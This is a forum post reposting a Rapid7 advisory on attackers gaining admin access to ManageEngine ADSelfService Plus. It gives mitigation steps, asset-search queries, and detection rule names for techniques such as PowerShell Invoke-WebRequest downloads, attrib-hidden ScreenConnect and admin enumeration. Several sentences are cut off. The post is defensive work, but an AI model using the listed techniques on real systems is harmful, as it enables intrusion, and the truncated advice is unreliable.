Attackers Gaining Administrative Access to Zoho ManageEngine ADSelfService Plus Instances
FYI anyone with internet facing selfservice should act quick
Administrative Access to Zoho ManageEngine ADSelfService Plus Instances
Detection and Response (MDR) recently observed several incidents in which
remote attackers have compromised internet-facing systems running
ManageEngine ADSelfService Plus in managed customer environments. The
attackers used valid ADSelfService Plus admin credentials to gain
Our team is working with the vendor to investigate potential root causes and
determine remediations. We are notifying our customers out of an abundance of
caution so that they may take steps to assess and mitigate risk to their
If your organization uses ManageEngine ADSelfService Plus, we strongly
- Changing the
“admin” user’s password and enabling multi-factor authentication (MFA)
for this account
- Taking the
affected systems offline entirely if suspicious activity is observed
What can Rapid7 InsightVM users do to determine their
InsightVM customers can use Query Builder to find assets running ADSelfService
Plus with the following query: `software.product` `ends with` `ADSelfService
Rapid7 Nexpose customers can create a Dynamic Asset Group based on a filtered asset
search for `Software name` `contains` `ADSelfService Plus`.
InsightIDR detect attacker behavior related to this attack?
Rapid7’s existing detection rules (listed below) are able to identify this
attack. We recommend that you review your settings for these detection rules
and confirm they are turned on and set to an appropriate rule action and
priority for your organization:
Process - Powershell Invoke-WebRequest
Technique - Attrib Sets File Or Directory As Hidden And System
Technique - Enumerating Domain Or Enterprise Admins With Net Command
Process - Zoho ManageEngine Spawns Child
We have also added the following detection rule and prioritized it as
Technique - Hiding ScreenConnect With Attrib
Rapid7 detection logic is continuously reviewed to ensure detections are
based on any observed attacker behavior seen by our Incident Response (IR),
Managed Detection and Response (MDR), and Threat Intelligence and Detection
Engineering (TIDE) teams. Through continuous collaboration and threat
landscape monitoring, we ensure product coverage for the latest techniques
being used by malicious actors and will make updates as necessary.
For up-to-date information on this threat, please refer to this article.
Does anyone know how to configure the admin account for MFA like indicated in the article?
New to ADSelfService Plus?